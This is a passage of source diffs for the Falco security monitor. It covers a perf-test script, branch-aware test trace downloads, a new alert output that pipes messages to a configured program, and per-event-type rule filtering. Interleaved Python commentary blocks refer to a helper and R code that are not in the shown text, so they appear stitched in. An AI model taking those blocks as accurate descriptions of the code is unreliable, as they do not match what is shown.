echo " -A/--agent-autodrop: When running an agent, whether or not to enable autodrop"
echo " -F/--falco-agent: When running an agent, whether or not to enable falco"
}
OPTS=`getopt -o hv:r:R:o:t:T: --long help,variant:,root:,results:,output:,test:,tracedir:,agent-autodrop:,falco-agent: -n $0 -- "$@"`
if [ $? != 0 ]; then
echo "Exiting" >&2
exit 1
fi
eval set -- "$OPTS"
VARIANT="falco"
ROOT=`dirname $0`/../build
SCRIPTDIR=`dirname $0`
RESULTS_FILE=`dirname $0`/results.json
OUTPUT_FILE=`dirname $0`/program-output.txt
TEST=trace:all
TRACEDIR=/tmp/falco-perf-traces.$USER
CPU_INTERVAL=10
AGENT_AUTODROP=1
FALCO_AGENT=1
while true; do
case "$1" in
-h | --help ) usage; exit 1;;
-v | --variant ) VARIANT="$2"; shift 2;;
-r | --root ) ROOT="$2"; shift 2;;
-R | --results ) RESULTS_FILE="$2"; shift 2;;
-o | --output ) OUTPUT_FILE="$2"; shift 2;;
-t | --test ) TEST="$2"; shift 2;;
-T | --tracedir ) TRACEDIR="$2"; shift 2;;
-A | --agent-autodrop ) AGENT_AUTODROP="$2"; shift 2;;
-F | --falco-agent ) FALCO_AGENT="$2"; shift 2;;
* ) break;;
esac
done
if [ -z $VARIANT ]; then
echo "A test variant name must be provided. Not continuing."
exit 1
fi
if [ -z $ROOT ]; then
echo "A root directory containing a falco/sysdig binary must be provided. Not continuing."
exit 1
fi
ROOT=`realpath $ROOT`
if [ -z $RESULTS_FILE ]; then
echo "An output file for test results must be provided. Not continuing."
exit 1
fi
if [ -z $OUTPUT_FILE ]; then
echo "A file for program output must be provided. Not continuing."
exit 1
fi
if [ -z $TEST ]; then
echo "A test must be provided. Not continuing."
exit 1
fi
run_tests
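The `time_cmd` helper in the script above appends one comma-terminated JSON object per timed run to `$RESULTS_FILE` (see its `--format` string), so the raw file is not a valid JSON document on its own. A minimal sketch of loading such a file, assuming only that format — the field values below are illustrative, not real measurements:

```python
import json
import os
import tempfile

def load_results(path):
    # time_cmd writes `{...},` per run; wrapping the whole file in
    # brackets and dropping the final trailing comma yields a JSON array.
    with open(path) as f:
        text = f.read().strip()
    return json.loads("[" + text.rstrip(",") + "]")

# Demo with the shape produced by time_cmd (values are made up):
sample = (
    '{"time": "t0", "benchmark": "b", "file": "b.scap", "variant": "falco", '
    '"elapsed": {"real": 1.5, "user": 1.2, "sys": 0.3}},\n'
    '{"time": "t1", "benchmark": "b", "file": "b.scap", "variant": "sysdig", '
    '"elapsed": {"real": 1.1, "user": 0.9, "sys": 0.2}},\n'
)
with tempfile.NamedTemporaryFile("w", suffix=".json", delete=False) as tmp:
    tmp.write(sample)
runs = load_results(tmp.name)
os.unlink(tmp.name)
```

The same wrap-and-strip trick is what a consumer like the R `fromJSON` callers above would need before the file parses cleanly.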


@ -3,11 +3,13 @@
 SCRIPT=$(readlink -f $0)
 SCRIPTDIR=$(dirname $SCRIPT)
 MULT_FILE=$SCRIPTDIR/falco_tests.yaml
+BRANCH=$1

 function download_trace_files() {
+	echo "branch=$BRANCH"
 	for TRACE in traces-positive traces-negative traces-info ; do
 		rm -rf $SCRIPTDIR/$TRACE
-		curl -so $SCRIPTDIR/$TRACE.zip https://s3.amazonaws.com/download.draios.com/falco-tests/$TRACE.zip &&
+		curl -fso $SCRIPTDIR/$TRACE.zip https://s3.amazonaws.com/download.draios.com/falco-tests/$TRACE-$BRANCH.zip || curl -fso $SCRIPTDIR/$TRACE.zip https://s3.amazonaws.com/download.draios.com/falco-tests/$TRACE.zip &&
 		unzip -d $SCRIPTDIR $SCRIPTDIR/$TRACE.zip &&
 		rm -rf $SCRIPTDIR/$TRACE.zip
 	done
@ -34,7 +36,7 @@ EOF
 }

 function prepare_multiplex_file() {
-	echo "trace_files: !mux" > $MULT_FILE
+	cp $SCRIPTDIR/falco_tests.yaml.in $MULT_FILE

 	prepare_multiplex_fileset traces-positive True Warning False
 	prepare_multiplex_fileset traces-negative False Warning True


@ -54,6 +54,20 @@ void falco_configuration::init(string conf_filename, std::list<std::string> &cmd
 		m_outputs.push_back(syslog_output);
 	}

+	output_config program_output;
+	program_output.name = "program";
+	if (m_config->get_scalar<bool>("program_output", "enabled", false))
+	{
+		string program;
+		program = m_config->get_scalar<string>("program_output", "program", "");
+		if (program == string(""))
+		{
+			throw sinsp_exception("Error reading config file (" + m_config_file + "): program output enabled but no program in configuration block");
+		}
+		program_output.options["program"] = program;
+		m_outputs.push_back(program_output);
+	}

 	if (m_outputs.size() == 0)
 	{
 		throw sinsp_exception("Error reading config file (" + m_config_file + "): No outputs configured. Please configure at least one output file output enabled but no filename in configuration block");


@ -55,6 +55,8 @@ static void usage()
 	       " -r <rules_file>  Rules file (defaults to value set in configuration file, or /etc/falco_rules.yaml).\n"
 	       " -L               Show the name and description of all rules and exit.\n"
 	       " -l <rule>        Show the name and description of the rule with name <rule> and exit.\n"
+	       " -v               Verbose output.\n"
+	       " -A               Monitor all events, including those with EF_DROP_FALCO flag.\n"
 	       "\n"
 	);
 }
@ -253,6 +255,8 @@ int falco_init(int argc, char **argv)
 	string pidfilename = "/var/run/falco.pid";
 	bool describe_all_rules = false;
 	string describe_rule = "";
+	bool verbose = false;
+	bool all_events = false;

 	static struct option long_options[] =
 	{
@ -272,7 +276,7 @@ int falco_init(int argc, char **argv)
 	// Parse the args
 	//
 	while((op = getopt_long(argc, argv,
-	                        "c:ho:e:r:dp:Ll:",
+	                        "c:ho:e:r:dp:Ll:vA",
 	                        long_options, &long_index)) != -1)
 	{
 		switch(op)
@ -301,6 +305,12 @@ int falco_init(int argc, char **argv)
 		case 'L':
 			describe_all_rules = true;
 			break;
+		case 'v':
+			verbose = true;
+			break;
+		case 'A':
+			all_events = true;
+			break;
 		case 'l':
 			describe_rule = optarg;
 			break;
@ -394,11 +404,14 @@ int falco_init(int argc, char **argv)
 	falco_fields::init(inspector, ls);
 	falco_logger::init(ls);
+	falco_rules::init(ls);

+	if(!all_events)
+	{
 		inspector->set_drop_event_flags(EF_DROP_FALCO);
+	}

-	rules->load_rules(config.m_rules_filename);
-	inspector->set_filter(rules->get_filter());
+	rules->load_rules(config.m_rules_filename, verbose, all_events);
 	falco_logger::log(LOG_INFO, "Parsed rules from file " + config.m_rules_filename + "\n");

 	if (describe_all_rules)


@ -1,6 +1,18 @@
local parser = require("parser")
local compiler = {}
compiler.verbose = false
compiler.all_events = false
function compiler.set_verbose(verbose)
compiler.verbose = verbose
parser.set_verbose(verbose)
end
function compiler.set_all_events(all_events)
compiler.all_events = all_events
end
function map(f, arr)
   local res = {}
   for i,v in ipairs(arr) do
@ -153,10 +165,111 @@ function check_for_ignored_syscalls_events(ast, filter_type, source)
      end
   end
-   parser.traverse_ast(ast, "BinaryRelOp", cb)
+   parser.traverse_ast(ast, {BinaryRelOp=1}, cb)
end
-- Examine the ast and find the event types for which the rule should
-- run. All evt.type references are added as event types up until the
-- first "!=" binary operator or unary not operator. If no event type
-- checks are found afterward in the rule, the rule is considered
-- optimized and is associated with the event type(s).
--
-- Otherwise, the rule is associated with a 'catchall' category and is
-- run for all event types. (Also, a warning is printed).
--
function get_evttypes(name, ast, source)
local evttypes = {}
local evtnames = {}
local found_event = false
local found_not = false
local found_event_after_not = false
function cb(node)
if node.type == "UnaryBoolOp" then
if node.operator == "not" then
found_not = true
end
else
if node.operator == "!=" then
found_not = true
end
if node.left.type == "FieldName" and node.left.value == "evt.type" then
found_event = true
if found_not then
found_event_after_not = true
end
if node.operator == "in" then
for i, v in ipairs(node.right.elements) do
if v.type == "BareString" then
evtnames[v.value] = 1
for id in string.gmatch(events[v.value], "%S+") do
evttypes[id] = 1
end
end
end
else
if node.right.type == "BareString" then
evtnames[node.right.value] = 1
for id in string.gmatch(events[node.right.value], "%S+") do
evttypes[id] = 1
end
end
end
end
end
end
parser.traverse_ast(ast.filter.value, {BinaryRelOp=1, UnaryBoolOp=1} , cb)
if not found_event then
io.stderr:write("Rule "..name..": warning (no-evttype):\n")
io.stderr:write(source.."\n")
io.stderr:write(" did not contain any evt.type restriction, meaning it will run for all event types.\n")
io.stderr:write(" This has a significant performance penalty. Consider adding an evt.type restriction if possible.\n")
evttypes = {}
evtnames = {}
end
if found_event_after_not then
io.stderr:write("Rule "..name..": warning (trailing-evttype):\n")
io.stderr:write(source.."\n")
io.stderr:write(" does not have all evt.type restrictions at the beginning of the condition,\n")
io.stderr:write(" or uses a negative match (i.e. \"not\"/\"!=\") for some evt.type restriction.\n")
io.stderr:write(" This has a performance penalty, as the rule can not be limited to specific event types.\n")
io.stderr:write(" Consider moving all evt.type restrictions to the beginning of the rule and/or\n")
io.stderr:write(" replacing negative matches with positive matches if possible.\n")
evttypes = {}
evtnames = {}
end
evtnames_only = {}
local num_evtnames = 0
for name, dummy in pairs(evtnames) do
table.insert(evtnames_only, name)
num_evtnames = num_evtnames + 1
end
if num_evtnames == 0 then
table.insert(evtnames_only, "all")
end
table.sort(evtnames_only)
if compiler.verbose then
io.stderr:write("Event types for rule "..name..": "..table.concat(evtnames_only, ",").."\n")
end
return evttypes
end
-function compiler.compile_macro(line)
+function compiler.compile_macro(line, list_defs)
+   for name, items in pairs(list_defs) do
+      line = string.gsub(line, name, table.concat(items, ", "))
+   end
   local ast, error_msg = parser.parse_filter(line)
   if (error_msg) then
@ -166,7 +279,9 @@ function compiler.compile_macro(line)
   -- Traverse the ast looking for events/syscalls in the ignored
   -- syscalls table. If any are found, return an error.
+   if not compiler.all_events then
      check_for_ignored_syscalls_events(ast, 'macro', line)
+   end
   return ast
end
@ -174,7 +289,12 @@ end
--[[
   Parses a single filter, then expands macros using passed-in table of definitions. Returns resulting AST.
--]]
-function compiler.compile_filter(source, macro_defs)
+function compiler.compile_filter(name, source, macro_defs, list_defs)
+   for name, items in pairs(list_defs) do
+      source = string.gsub(source, name, table.concat(items, ", "))
+   end
   local ast, error_msg = parser.parse_filter(source)
   if (error_msg) then
@ -184,7 +304,9 @@ function compiler.compile_filter(source, macro_defs)
   -- Traverse the ast looking for events/syscalls in the ignored
   -- syscalls table. If any are found, return an error.
+   if not compiler.all_events then
      check_for_ignored_syscalls_events(ast, 'rule', source)
+   end
   if (ast.type == "Rule") then
      -- Line is a filter, so expand macro references
@ -196,7 +318,9 @@ function compiler.compile_filter(source, macro_defs)
      error("Unexpected top-level AST type: "..ast.type)
   end
-   return ast
+   evttypes = get_evttypes(name, ast, source)
+   return ast, evttypes
end
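The `get_evttypes` logic added above boils down to: collect `evt.type` values from the condition, but fall back to the catchall category if no `evt.type` check exists or if one appears after a negation. A simplified Python model of that decision — flattened `(operator, field, value)` triples stand in for the parsed AST; this is an illustration, not a port of the Lua:

```python
def get_evttypes(tokens):
    # tokens: (operator, field, value) triples in condition order.
    evtnames = set()
    found_not = False
    found_event = False
    found_event_after_not = False
    for op, field, value in tokens:
        if op in ("not", "!="):
            found_not = True
        if field == "evt.type":
            found_event = True
            if found_not:
                found_event_after_not = True  # restriction after a negation
            else:
                evtnames.add(value)
    # No evt.type restriction, or one after a "not"/"!=": catchall,
    # i.e. the rule must run for all event types.
    if not found_event or found_event_after_not:
        return set()
    return evtnames
```

This is why the warnings above suggest moving `evt.type` checks to the front of a condition and avoiding negative matches on them.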


@ -27,7 +27,7 @@ function mod.file_validate(options)
end

function mod.file(evt, rule, level, format, options)
-   format = "%evt.time: "..levels[level+1].." "..format
+   format = "*%evt.time: "..levels[level+1].." "..format
   formatter = falco.formatter(format)
   msg = falco.format_event(evt, rule, levels[level+1], formatter)
@ -43,6 +43,22 @@ function mod.syslog(evt, rule, level, format)
   falco.syslog(level, msg)
end

+function mod.program(evt, rule, level, format, options)
+   format = "*%evt.time: "..levels[level+1].." "..format
+   formatter = falco.formatter(format)
+   msg = falco.format_event(evt, rule, levels[level+1], formatter)
+
+   -- XXX Ideally we'd check that the program ran
+   -- successfully. However, the luajit we're using returns true even
+   -- when the shell can't run the program.
+
+   file = io.popen(options.program, "w")
+   file:write(msg, "\n")
+   file:close()
+end
+
function mod.event(event, rule, level, format)
   for index,o in ipairs(outputs) do
      o.output(event, rule, level, format, o.config)


@ -11,6 +11,12 @@
local parser = {}

+parser.verbose = false
+
+function parser.set_verbose(verbose)
+   parser.verbose = verbose
+end

local lpeg = require "lpeg"
lpeg.locale(lpeg)
@ -236,7 +242,8 @@ local G = {
      symb("<") / "<" +
      symb(">") / ">" +
      symb("contains") / "contains" +
-      symb("icontains") / "icontains";
+      symb("icontains") / "icontains" +
+      symb("startswith") / "startswith";
   InOp = kw("in") / "in";
   UnaryBoolOp = kw("not") / "not";
   ExistsOp = kw("exists") / "exists";
@ -296,33 +303,33 @@ parser.print_ast = print_ast
-- have the signature:
-- cb(ast_node, ctx)
-- ctx is optional.
-function traverse_ast(ast, node_type, cb, ctx)
+function traverse_ast(ast, node_types, cb, ctx)
   local t = ast.type
-   if t == node_type then
+   if node_types[t] ~= nil then
      cb(ast, ctx)
   end
   if t == "Rule" then
-      traverse_ast(ast.filter, node_type, cb, ctx)
+      traverse_ast(ast.filter, node_types, cb, ctx)
   elseif t == "Filter" then
-      traverse_ast(ast.value, node_type, cb, ctx)
+      traverse_ast(ast.value, node_types, cb, ctx)
   elseif t == "BinaryBoolOp" or t == "BinaryRelOp" then
-      traverse_ast(ast.left, node_type, cb, ctx)
-      traverse_ast(ast.right, node_type, cb, ctx)
+      traverse_ast(ast.left, node_types, cb, ctx)
+      traverse_ast(ast.right, node_types, cb, ctx)
   elseif t == "UnaryRelOp" or t == "UnaryBoolOp" then
-      traverse_ast(ast.argument, node_type, cb, ctx)
+      traverse_ast(ast.argument, node_types, cb, ctx)
   elseif t == "List" then
      for i, v in ipairs(ast.elements) do
-         traverse_ast(v, node_type, cb, ctx)
+         traverse_ast(v, node_types, cb, ctx)
      end
   elseif t == "MacroDef" then
-      traverse_ast(ast.value, node_type, cb, ctx)
+      traverse_ast(ast.value, node_types, cb, ctx)
   elseif t == "FieldName" or t == "Number" or t == "String" or t == "BareString" or t == "Macro" then
      -- do nothing, no traversal needed


@ -115,9 +115,12 @@ end
-- object. The by_name index is used for things like describing rules,
-- and the by_idx index is used to map the relational node index back
-- to a rule.
-local state = {macros={}, filter_ast=nil, rules_by_name={}, n_rules=0, rules_by_idx={}}
+local state = {macros={}, lists={}, filter_ast=nil, rules_by_name={}, n_rules=0, rules_by_idx={}}

-function load_rules(filename)
+function load_rules(filename, rules_mgr, verbose, all_events)
+   compiler.set_verbose(verbose)
+   compiler.set_all_events(all_events)

   local f = assert(io.open(filename, "r"))
   local s = f:read("*all")
@ -131,9 +134,28 @@ function load_rules(filename)
      end

      if (v['macro']) then
-         local ast = compiler.compile_macro(v['condition'])
+         local ast = compiler.compile_macro(v['condition'], state.lists)
         state.macros[v['macro']] = ast.filter.value

+      elseif (v['list']) then
+         -- list items are represented in yaml as a native list, so no
+         -- parsing necessary
+         local items = {}
+
+         -- List items may be references to other lists, so go through
+         -- the items and expand any references to the items in the list
+         for i, item in ipairs(v['items']) do
+            if (state.lists[item] == nil) then
+               items[#items+1] = item
+            else
+               for i, exp_item in ipairs(state.lists[item]) do
+                  items[#items+1] = exp_item
+               end
+            end
+         end
+
+         state.lists[v['list']] = items
+
      else -- rule

         if (v['rule'] == nil) then
@ -150,7 +172,8 @@ function load_rules(filename)
         v['level'] = priority(v['priority'])
         state.rules_by_name[v['rule']] = v

-         local filter_ast = compiler.compile_filter(v['condition'], state.macros)
+         local filter_ast, evttypes = compiler.compile_filter(v['rule'], v['condition'],
+                                                              state.macros, state.lists)

         if (filter_ast.type == "Rule") then
            state.n_rules = state.n_rules + 1
@ -164,6 +187,11 @@ function load_rules(filename)
            -- event.
            mark_relational_nodes(filter_ast.filter.value, state.n_rules)

+            install_filter(filter_ast.filter.value)
+            -- Pass the filter and event types back up
+            falco_rules.add_filter(rules_mgr, evttypes)

            -- Rule ASTs are merged together into one big AST, with "OR" between each
            -- rule.
            if (state.filter_ast == nil) then
@ -177,7 +205,6 @@ function load_rules(filename)
         end
      end
   end

-   install_filter(state.filter_ast)
   io.flush()
end


@ -1,4 +1,5 @@
 #include "rules.h"
+#include "logger.h"

 extern "C" {
 #include "lua.h"
@ -6,6 +7,11 @@ extern "C" {
 #include "lauxlib.h"
 }

+const static struct luaL_reg ll_falco_rules [] =
+{
+	{"add_filter", &falco_rules::add_filter},
+	{NULL,NULL}
+};

 falco_rules::falco_rules(sinsp* inspector, lua_State *ls, string lua_main_filename)
 {
@ -17,6 +23,48 @@ falco_rules::falco_rules(sinsp* inspector, lua_State *ls, string lua_main_filena
 	load_compiler(lua_main_filename);
 }
void falco_rules::init(lua_State *ls)
{
luaL_openlib(ls, "falco_rules", ll_falco_rules, 0);
}
int falco_rules::add_filter(lua_State *ls)
{
if (! lua_islightuserdata(ls, -2) ||
! lua_istable(ls, -1))
{
falco_logger::log(LOG_ERR, "Invalid arguments passed to add_filter()\n");
throw sinsp_exception("add_filter error");
}
falco_rules *rules = (falco_rules *) lua_topointer(ls, -2);
list<uint32_t> evttypes;
lua_pushnil(ls); /* first key */
while (lua_next(ls, -2) != 0) {
// key is at index -2, value is at index
// -1. We want the keys.
evttypes.push_back(luaL_checknumber(ls, -2));
// Remove value, keep key for next iteration
lua_pop(ls, 1);
}
rules->add_filter(evttypes);
return 0;
}
void falco_rules::add_filter(list<uint32_t> &evttypes)
{
// While the current rule was being parsed, a sinsp_filter
// object was being populated by lua_parser. Grab that filter
// and pass it to the inspector.
sinsp_filter *filter = m_lua_parser->get_filter(true);
m_inspector->add_evttype_filter(evttypes, filter);
}
 void falco_rules::load_compiler(string lua_main_filename)
 {
@ -40,18 +88,47 @@ void falco_rules::load_compiler(string lua_main_filename)
 	}
 }

-void falco_rules::load_rules(string rules_filename)
+void falco_rules::load_rules(string rules_filename, bool verbose, bool all_events)
 {
 	lua_getglobal(m_ls, m_lua_load_rules.c_str());
 	if(lua_isfunction(m_ls, -1))
 	{
// Create a table containing all events, so they can
// be mapped to event ids.
sinsp_evttables* einfo = m_inspector->get_event_info_tables();
const struct ppm_event_info* etable = einfo->m_event_info;
const struct ppm_syscall_desc* stable = einfo->m_syscall_info_table;
map<string,string> events_by_name;
for(uint32_t j = 0; j < PPM_EVENT_MAX; j++)
{
auto it = events_by_name.find(etable[j].name);
if (it == events_by_name.end()) {
events_by_name[etable[j].name] = to_string(j);
} else {
string cur = it->second;
cur += " ";
cur += to_string(j);
events_by_name[etable[j].name] = cur;
}
}
lua_newtable(m_ls);
for( auto kv : events_by_name)
{
lua_pushstring(m_ls, kv.first.c_str());
lua_pushstring(m_ls, kv.second.c_str());
lua_settable(m_ls, -3);
}
lua_setglobal(m_ls, m_lua_events.c_str());
 		// Create a table containing the syscalls/events that
 		// are ignored by the kernel module. load_rules will
 		// return an error if any rule references one of these
 		// syscalls/events.
-		sinsp_evttables* einfo = m_inspector->get_event_info_tables();
-		const struct ppm_event_info* etable = einfo->m_event_info;
-		const struct ppm_syscall_desc* stable = einfo->m_syscall_info_table;

 		lua_newtable(m_ls);
@ -82,7 +159,10 @@ void falco_rules::load_rules(string rules_filename)
 		lua_setglobal(m_ls, m_lua_ignored_syscalls.c_str());

 		lua_pushstring(m_ls, rules_filename.c_str());
-		if(lua_pcall(m_ls, 1, 0, 0) != 0)
+		lua_pushlightuserdata(m_ls, this);
+		lua_pushboolean(m_ls, (verbose ? 1 : 0));
+		lua_pushboolean(m_ls, (all_events ? 1 : 0));
+		if(lua_pcall(m_ls, 4, 0, 0) != 0)
 		{
 			const char* lerr = lua_tostring(m_ls, -1);
 			string err = "Error loading rules:" + string(lerr);


@ -1,5 +1,7 @@
 #pragma once

+#include <list>

 #include "sinsp.h"
 #include "lua_parser.h"

@ -8,13 +10,18 @@ class falco_rules
 public:
 	falco_rules(sinsp* inspector, lua_State *ls, string lua_main_filename);
 	~falco_rules();
-	void load_rules(string rules_filename);
+	void load_rules(string rules_filename, bool verbose, bool all_events);
 	void describe_rule(string *rule);
 	sinsp_filter* get_filter();

+	static void init(lua_State *ls);
+	static int add_filter(lua_State *ls);
+
 private:
 	void load_compiler(string lua_main_filename);
+	void add_filter(list<uint32_t> &evttypes);

 	lua_parser* m_lua_parser;
 	sinsp* m_inspector;
 	lua_State* m_ls;
@ -22,6 +29,7 @@ class falco_rules
 	string m_lua_load_rules = "load_rules";
 	string m_lua_ignored_syscalls = "ignored_syscalls";
 	string m_lua_ignored_events = "ignored_events";
+	string m_lua_events = "events";
 	string m_lua_on_event = "on_event";
 	string m_lua_describe_rule = "describe_rule";
 };
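Taken together, `get_evttypes` (Lua) and `add_filter`/`add_evttype_filter` (C++) implement the per-event-type rule grouping described in the release notes: each rule's filter is registered under the event types it can match, and only those filters, plus any catchall rules, are evaluated for a given event. A toy Python model of that dispatch, assuming nothing beyond what the notes describe:

```python
class EvttypeFilterDispatcher:
    def __init__(self):
        self.by_evttype = {}  # event type id -> filters limited to that type
        self.catchall = []    # filters with no evt.type restriction

    def add_filter(self, evttypes, filt):
        # An empty evttypes list means the rule could not be tied to
        # specific event types (the "catchall" category).
        if not evttypes:
            self.catchall.append(filt)
        for et in evttypes:
            self.by_evttype.setdefault(et, []).append(filt)

    def matches(self, evttype, evt):
        # Only filters registered for this event type (plus catchall
        # filters) run, which is where the CPU savings come from.
        for filt in self.by_evttype.get(evttype, []) + self.catchall:
            if filt(evt):
                return True
        return False

d = EvttypeFilterDispatcher()
d.add_filter([2, 3], lambda evt: evt == "open /etc/shadow")
d.add_filter([], lambda evt: evt == "suspicious")
```

Event type ids and the lambda conditions here are placeholders; the real dispatch lives in sysdig's `add_evttype_filter` and runs compiled `sinsp_filter` objects.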